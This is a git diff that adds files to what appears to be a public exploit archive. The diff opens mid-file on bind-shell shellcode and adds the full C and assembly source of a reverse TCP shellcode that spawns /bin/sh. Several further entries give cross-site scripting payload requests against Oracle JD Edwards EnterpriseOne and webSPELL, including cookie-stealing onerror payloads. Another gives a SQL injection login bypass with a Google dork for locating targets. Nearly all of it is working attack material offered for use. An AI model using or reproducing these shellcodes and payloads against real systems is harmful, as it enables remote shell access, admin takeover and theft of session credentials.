"\x0f\x05" /* syscall */ + "\xb0\x2b" /* mov $0x2b,%al */ + "\x0f\x05" /* syscall */ + "\x50" /* push %rax */ + "\x5f" /* pop %rdi */ + "\x6a\x03" /* pushq $0x3 */ + "\x5e" /* pop %rsi */ + "\xff\xce" /* dec %esi */ + "\xb0\x21" /* mov $0x21,%al */ + "\x0f\x05" /* syscall */ + "\x75\xf8" /* jne 35 */ + "\x56" /* push %rsi */ + "\x5a" /* pop %rdx */ + "\x56" /* push %rsi */ + "\x48\xbf\x2f\x2f\x62\x69\x6e" /* movabs $0x68732f6e69622f2f,%rdi */ + "\x2f\x73\x68" /* . */ + "\x57" /* push %rdi */ + "\x54" /* push %rsp */ + "\x5f" /* pop %rdi */ + "\xb0\x3b" /* mov $0x3b,%al */ + "\x0f\x05" /* syscall */; + +main(void) +{ + printf("Shellcode length: %d\n", (int)strlen(shellcode)); + + /* pollute registers and call shellcode */ + __asm__ ( "mov $0xffffffffffffffff, %rax\n\t" + "mov %rax, %rbx\n\t" + "mov %rax, %rcx\n\t" + "mov %rax, %rdx\n\t" + "mov %rax, %rsi\n\t" + "mov %rax, %rdi\n\t" + "mov %rax, %rbp\n\t" + + "call shellcode" ); +} + +/* -------------------------------------------------------------------------------------- + +; Author: Sean Dillon +; Company: CAaNES, LLC. (http://caanes.com) +; Release Date: December 19, 2014 +; +; Description: x64 Linux null-free bind TCP port shellcode, optional 4 byte password +; Assembled Size: 81 bytes, 96 with password +; Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64 +; License: http://opensource.org/license/MIT +; +; Build/Run: nasm -f elf64 -o bindshell.o bindshell.nasm +; ld -o bindshell bindshell.o +; objdump -d --disassembler-options=addr64 bindshell + +BITS 64 +global _start +section .text + +; settings +%define USEPASSWORD ; comment this to not require password +PASSWORD equ 'Z~r0' ; cmp dword (SEGFAULT on fail; no bruteforce/cracking/etc.) +PORT equ 0x5c11 ; default 4444 + +; syscall kernel opcodes +SYS_SOCKET equ 0x29 +SYS_BIND equ 0x31 +SYS_LISTEN equ 0x32 +SYS_ACCEPT equ 0x2b +SYS_DUP2 equ 0x21 +SYS_EXECVE equ 0x3b + +; argument constants +AF_INET equ 0x2 +SOCK_STREAM equ 0x1 + +_start: +; High level psuedo-C overview of shellcode logic: +; +; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP) +; struct sockaddr = {AF_INET; [PORT; 0x0; 0x0]} +; +; bind(sockfd, &sockaddr, 16) +; listen(sockfd, 0) +; client = accept(sockfd, &sockaddr, 16) +; +; read(client, *pwbuf, 16) // 16 > 4 +; if (pwbuf != PASSWORD) goto drop +; +; dup2(client, STDIN+STDOUT+STDERR) +; execve("/bin/sh", NULL, NULL) + +create_sock: + ; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP) + + xor esi, esi ; 0 out rsi + mul esi ; 0 out rax, rdx + + ; rdx = IPPROTO_IP (int: 0) + + inc esi ; rsi = SOCK_STREAM (int: 1) + + push AF_INET ; rdi = AF_INET (int: 2) + pop rdi + + add al, SYS_SOCKET + syscall + + ; store sock + push rax + pop rdi ; rdi = sockfd + +struct_sockaddr: + ; struct sockaddr = {AF_INET; PORT; 0x0; 0x0} + + push rdx ; 0 out the stack for struct + push rdx + + mov byte [rsp], AF_INET ; sockaddr.sa_family = AF_INET (u_char) + mov word [rsp + 0x2], PORT ; sockaddr.sa_data[] = PORT (short) + push rsp + pop rsi ; rsi = &sockaddr + +bind_port: + ; bind(sockfd, const struct sockaddr *addr, 16) + + push rdx ; save 0 for rsi in SYS_LISTEN + + push 0x10 ; rdx = 16 (sizeof sockaddr) + pop rdx + + push SYS_BIND + pop rax + syscall + +server_listen: + ; listen(sockfd, 0) + + pop rsi ; backlog = 0 (int) + mov al, SYS_LISTEN + syscall + +client_accept: + ; client = accept(sockfd, struct sockaddr *addr, 16) + + mov al, SYS_ACCEPT + syscall + + ; store client + push rax + pop rdi ; rdi = client + + ; no need to close parent, save bytes + +%ifdef USEPASSWORD +password_check: + ; password = read(client, *buf, 4) + + push rsp + pop rsi ; rsi = &buf (char*) + + ; rdx = 0x10, >4 bytes + xor eax, eax ; SYS_READ = 0x0 + syscall + + cmp dword [rsp], PASSWORD ; simple comparison + jne drop ; bad pw, abort +%endif + +dupe_sockets: + ; dup2(client, STDIN) + ; dup2(client, STDOUT) + ; dup2(client, STERR) + + push 0x3 ; loop down file descriptors for I/O + pop rsi + +dupe_loop: + dec esi + mov al, SYS_DUP2 + syscall + + jne dupe_loop + +exec_shell: + ; execve('//bin/sh', NULL, NULL) + + push rsi ; *argv[] = 0 + pop rdx ; *envp[] = 0 + + push rsi ; '\0' + mov rdi, '//bin/sh' ; str + push rdi + push rsp + pop rdi ; rdi = &str (char*) + + mov al, SYS_EXECVE ; we fork with this syscall + syscall + +drop: + ; password check failed, crash program with BADINSTR/SEGFAULT + +;--------------------------------------------------------------------------------------*/ diff --git a/platforms/lin_x86-64/shellcode/35587.c b/platforms/lin_x86-64/shellcode/35587.c new file mode 100755 index 000000000..54f67c232 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/35587.c @@ -0,0 +1,246 @@ +/* +* Author: Sean Dillon +* Copyright: (c) 2014 CAaNES, LLC. (http://caanes.com) +* Release Date: December 19, 2014 +* +* Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password +* Assembled Size: 77 - 85 bytes, 90 - 98 with password +* Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64 +* License: http://opensource.org/license/MIT +* +* Build/Run: gcc -m64 -z execstack -fno-stack-protector reverseshell.c -o reverseshell.out +* nc -l -p 4444 +*/ + +/* +* NOTE: This C code connects to 127.0.0.1:4444 and does not have the password option enabled. +* Because the IP 127.0.0.1 contains null-bytes, a mask has to be used, adding 8 bytes. +* The end of this file contains the .nasm source code and instructions for building from that. +*/ + +#include +#include + +char shellcode[] = + "\x31\xf6" /* xor %esi,%esi */ + "\xf7\xe6" /* mul %esi */ + "\xff\xc6" /* inc %esi */ + "\x6a\x02" /* pushq $0x2 */ + "\x5f" /* pop %rdi */ + "\x04\x29" /* add $0x29,%al */ + "\x0f\x05" /* syscall */ + "\x50" /* push %rax */ + "\x5f" /* pop %rdi */ + "\x52" /* push %rdx */ + "\x52" /* push %rdx */ + "\xc7\x44\x24\x04\x7d\xff\xfe" /* movl $0xfefeff7d,0x4(%rsp) */ + "\xfe" /* . */ + "\x81\x44\x24\x04\x02\x01\x01" /* addl $0x2010102,0x4(%rsp) */ + "\x02" /* . */ + "\x66\xc7\x44\x24\x02\x11\x5c" /* movw $0x5c11,0x2(%rsp) */ + "\xc6\x04\x24\x02" /* movb $0x2,(%rsp) */ + "\x54" /* push %rsp */ + "\x5e" /* pop %rsi */ + "\x6a\x10" /* pushq $0x10 */ + "\x5a" /* pop %rdx */ + "\x6a\x2a" /* pushq $0x2a */ + "\x58" /* pop %rax */ + "\x0f\x05" /* syscall */ + "\x6a\x03" /* pushq $0x3 */ + "\x5e" /* pop %rsi */ + "\xff\xce" /* dec %esi */ + "\xb0\x21" /* mov $0x21,%al */ + "\x0f\x05" /* syscall */ + "\x75\xf8" /* jne 39 */ + "\x56" /* push %rsi */ + "\x5a" /* pop %rdx */ + "\x56" /* push %rsi */ + "\x48\xbf\x2f\x2f\x62\x69\x6e" /* movabs $0x68732f6e69622f2f,%rdi */ + "\x2f\x73\x68" /* . */ + "\x57" /* push %rdi */ + "\x54" /* push %rsp */ + "\x5f" /* pop %rdi */ + "\xb0\x3b" /* mov $0x3b,%al */ + "\x0f\x05" /* syscall */; + + +main(void) +{ + printf("Shellcode length: %d\n", (int)strlen(shellcode)); + + /* pollute registers and call shellcode */ + __asm__ ( "mov $0xffffffffffffffff, %rax\n\t" + "mov %rax, %rbx\n\t" + "mov %rax, %rcx\n\t" + "mov %rax, %rdx\n\t" + "mov %rax, %rsi\n\t" + "mov %rax, %rdi\n\t" + "mov %rax, %rbp\n\t" + + "call shellcode" ); +} + + +/* -------------------------------------------------------------------------------------- + +; Author: Sean Dillon +; Company: CAaNES, LLC. (http://caanes.com) +; Release Date: December 19, 2014 +; +; Description: x64 Linux null-free reverse TCP shellcode, optional 4 byte password +; Assembled Size: 77 - 85 bytes, 90 - 98 with password +; Tested On: Kali 1.0.9a GNU/Linux 3.14.5-kali1-amd64 x86_64 +; License: http://opensource.org/license/MIT +; +; Build/Run: nasm -f elf64 -o reverseshell.o reverseshell.nasm +; ld -o reverseshell reverseshell.o +; objdump -d --disassembler-options=addr64 reverseshell + +BITS 64 +global _start +section .text + +; settings +%define USEPASSWORD ; comment this to not require password +PASSWORD equ 'Z~r0' ; cmp dword (SEGFAULT on fail; no bruteforce/cracking/etc.) +IP equ 0x0100007f ; default 127.0.0.1, contains nulls so will need mask +PORT equ 0x5c11 ; default 4444 + +; change the null-free mask as needed +%define NULLFREE_MASK 0x02010102 ; comment this out if no .0. in IP, save 8 bytes + +%ifdef NULLFREE_MASK +%define NULLFREE_IP IP - NULLFREE_MASK +%else +%define NULLFREE_IP IP +%endif + +; syscall kernel opcodes +SYS_SOCKET equ 0x29 +SYS_CONNECT equ 0x2a +SYS_DUP2 equ 0x21 +SYS_EXECVE equ 0x3b + +; argument constants +AF_INET equ 0x2 +SOCK_STREAM equ 0x1 + +_start: +; High level psuedo-C overview of shellcode logic: +; +; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP) +; IP = NULLFREE_IP + NULLFREE_MASK +; struct sockaddr = {AF_INET; [PORT; IP; 0x0]} +; +; connect(sockfd, &sockaddr, 16) +; +; read(sockfd, *pwbuf, 16) // 16 > 4 +; if (pwbuf != PASSWORD) goto drop +; +; dup2(sockfd, STDIN+STDOUT+STDERR) +; execve("/bin/sh", NULL, NULL) + +create_sock: + ; sockfd = socket(AF_INET, SOCK_STREAM, 0) + ; AF_INET = 2 + ; SOCK_STREAM = 1 + ; syscall number 41 + + xor esi, esi ; 0 out rsi + mul esi ; 0 out rax, rdx + + ; rdx = IPPROTO_IP (int: 0) + + inc esi ; rsi = SOCK_STREAM (int: 1) + + push AF_INET ; rdi = AF_INET (int: 2) + pop rdi + + add al, SYS_SOCKET + syscall + + ; copy socket descriptor to rdi for future use + + push rax + pop rdi + +struct_sockaddr: + ; server.sin_family = AF_INET + ; server.sin_port = htons(PORT) + ; server.sin_addr.s_addr = inet_addr("127.0.0.1") + ; bzero(&server.sin_zero, 8) + + push rdx + push rdx + + mov dword [rsp + 0x4], NULLFREE_IP + +%ifdef NULLFREE_MASK + add dword [rsp + 0x4], NULLFREE_MASK +%endif + + mov word [rsp + 0x2], PORT + mov byte [rsp], AF_INET + +connect_sock: + ; connect(sockfd, (struct sockaddr *)&server, sockaddr_len) + + push rsp + pop rsi + + push 0x10 + pop rdx + + push SYS_CONNECT + pop rax + syscall + + +%ifdef USEPASSWORD +password_check: + ; password = read(sockfd, *buf, 4) + + ; rsi = &buf (char*) + ; rdx = 0x10, >4 bytes + + xor eax, eax ; SYS_READ = 0x0 + syscall + + cmp dword [rsp], PASSWORD ; simple comparison + jne drop ; bad pw, abort +%endif + +dupe_sockets: + ; dup2(sockfd, STDIN) + ; dup2(sockfd, STDOUT) + ; dup2(sockfd, STERR) + + push 0x3 ; loop down file descriptors for I/O + pop rsi + +dupe_loop: + dec esi + mov al, SYS_DUP2 + syscall + + jne dupe_loop + +exec_shell: + ; execve('//bin/sh', NULL, NULL) + + push rsi ; *argv[] = 0 + pop rdx ; *envp[] = 0 + + push rsi ; '\0' + mov rdi, '//bin/sh' ; str + push rdi + push rsp + pop rdi ; rdi = &str (char*) + + mov al, SYS_EXECVE ; we fork with this syscall + syscall + +drop: + ; password check failed, crash program with BADINSTR/SEGFAULT + +;--------------------------------------------------------------------------------------*/ diff --git a/platforms/multiple/remote/35638.txt b/platforms/multiple/remote/35638.txt new file mode 100755 index 000000000..ca624ddb9 --- /dev/null +++ b/platforms/multiple/remote/35638.txt @@ -0,0 +1,28 @@ +source: http://www.securityfocus.com/bid/47479/info + +Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This vulnerability affects the following supported versions: +8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 + +http://XXX.XXX.XXX.XXX/jde/E1Menu.maf + +Parameter: jdeowpBackButtonProtect + + + +* The GET request has been set to: >'"> + +/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED&%3E%27%22%3E%3Cscript%3Ealert%2820639%29%3C%2Fscript%3E=123 HTTP/1.0 + +Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00002ZzkuqI4ibppzAAcyOOuBnh:14p7umbnp; e1MenuState=100003759| + +Accept: */* + +Accept-Language: en-US + +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) + +Host: XXX.XXX.XXX.XXX \ No newline at end of file diff --git a/platforms/multiple/remote/35639.txt b/platforms/multiple/remote/35639.txt new file mode 100755 index 000000000..c16d55d31 --- /dev/null +++ b/platforms/multiple/remote/35639.txt @@ -0,0 +1,39 @@ +source: http://www.securityfocus.com/bid/47479/info + +Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This vulnerability affects the following supported versions: +8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 + + +http://XXX.XXX.XXX.XXX/jde/E1Menu_Menu.mafService + +Parameter: e1.namespace + + + +* The POST request has been set to: %2Balert%2835890%29%2B + + /jde/E1Menu_Menu.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_Menu&e1.namespace=%2Balert%2835890%29%2B HTTP/1.0 + +Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000b7KChC3OjQct7TOz9U6NMhK:14p7umbnp; e1MenuState=100003759| + +Content-Length: 12 + +Accept: */* + +Accept-Language: en-US + +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) + +Host: XXX.XXX.XXX.XXX + +Content-Type: application/x-www-form-urlencoded + +Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED + + + +nodeId=&a=lc \ No newline at end of file diff --git a/platforms/multiple/remote/35640.txt b/platforms/multiple/remote/35640.txt new file mode 100755 index 000000000..73ce5b1c1 --- /dev/null +++ b/platforms/multiple/remote/35640.txt @@ -0,0 +1,33 @@ +source: http://www.securityfocus.com/bid/47479/info + +Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This vulnerability affects the following supported versions: +8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 + +http://XXX.XXX.XXX.XXX/jde/E1Menu_OCL.mafService + +Parameter: e1.namespace + + + +* The GET request has been set to: %2Balert%2848981%29%2B + + + +/jde/E1Menu_OCL.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_OCL&e1.namespace=%2Balert%2848981%29%2B×tamp=1290796450377 +HTTP/1.0 + +Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000xXDQLJurffGMVi6Du_UnL0Z:14p7umbnp; e1MenuState=100003759| + +Accept: */* + +Accept-Language: en-US + +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) + +Host: XXX.XXX.XXX.XXX + +Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED \ No newline at end of file diff --git a/platforms/multiple/remote/35641.txt b/platforms/multiple/remote/35641.txt new file mode 100755 index 000000000..328afd615 --- /dev/null +++ b/platforms/multiple/remote/35641.txt @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/47479/info + +Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This vulnerability affects the following supported versions: +8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 + +http://XXX.XXX.XXX.XXX/jde/MafletClose.mafService + +Parameter: RENDER_MAFLET + + + +* The GET request has been set to: E1Menu"%2Balert%2844218%29%2B" + + + +/jde/MafletClose.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu"%2Balert%2844218%29%2B"&e1.service=MafletClose&e1.namespace= HTTP/1.0 + +Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000FGUGWkc2Y9q-dO3GqshuPVQ:14p7umbnp; e1MenuState=100003759| + +Accept: */* + +Accept-Language: en-US + +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) + +Host: XXX.XXX.XXX.XXX + +Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED \ No newline at end of file diff --git a/platforms/multiple/remote/35642.txt b/platforms/multiple/remote/35642.txt new file mode 100755 index 000000000..a983246e4 --- /dev/null +++ b/platforms/multiple/remote/35642.txt @@ -0,0 +1,33 @@ +source: http://www.securityfocus.com/bid/47479/info + +Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This vulnerability affects the following supported versions: +8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 + +* http://XXX.XXX.XXX.XXX/jde/JASMafletMafBrowserClose.mafService + +Parameter: jdemafjasLinkTarget + + + +* The GET request has been set to: E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B" + + + +/jde/JASMafletMafBrowserClose.mafService?jdemafjasFrom=BrowserClose&e1.mode=view&jdeLoginAction=LOGOUT&e1.state=maximized&jdemafjasLinkTarget=E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B"&RENDER_MAFLET=E1Menu&jdemafjasLauncher=PSFT_TE_V3_SW&e1.service=JASMafletMafBrowserClose&e1.namespace= +HTTP/1.0 + +Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00003wyVho0_-Ma0fQp67cuqdCs:14p7ulc8o; e1MenuState=100003759| + +Accept: */* + +Accept-Language: en-US + +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) + +Host: XXX.XXX.XXX.XXX + +Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED \ No newline at end of file diff --git a/platforms/php/webapps/35492.txt b/platforms/php/webapps/35492.txt new file mode 100755 index 000000000..f2df43f27 --- /dev/null +++ b/platforms/php/webapps/35492.txt @@ -0,0 +1,40 @@ +# Exploit Title: Free Article Submissions SQL Injection Vulnerability +# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal" + inurl:/category.php?id=2 "Arts & Entertainment" +# Date: 07/12/2014 +# Exploit Author: BarrabravaZ +# Vendor Homepage: http://www.articlesetup.com/ +# Software Link: [download link if available] +# Version: 1.00 +# Tested on: Windows + + + xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx + «««:»»» Author will be not responsible for any damage. «««:»»» + xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +x +x Issue: +x SQL Injection Bypass Login +x +x Risk level: High +x ~ The remote attacker has the possibility to manage the website. +x ~ The remote attacker is able to login into website with access level as admin. +x + xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx + + xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +## +## Proof Of Concept: +## http://127.0.0.1/admin/login.php +## +## Username : ' OR 1=1 # +## Password : barrabravaz +## +## + xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx + + xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +Special thanks to: +[+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX +[+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink + xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx \ No newline at end of file diff --git a/platforms/php/webapps/35643.txt b/platforms/php/webapps/35643.txt new file mode 100755 index 000000000..babf7c603 --- /dev/null +++ b/platforms/php/webapps/35643.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/47500/info + +webSPELL is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +webSPELL 4.2.2a is affected; other versions may also be vulnerable. + + +http://www.example.com/index.php?site=newsletter&pass=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E +http://www.example.com/index.php?site=messenger&action=touser&touser=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E +http://www.example.com/admin/admincenter.php?site=users&action=addtoclan&id=1&page=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E +http://www.example.com/admin/admincenter.php?site=squads&action=edit&squadID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E +http://www.example.com/admin/admincenter.php?site=contact&action=edit&contactID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E \ No newline at end of file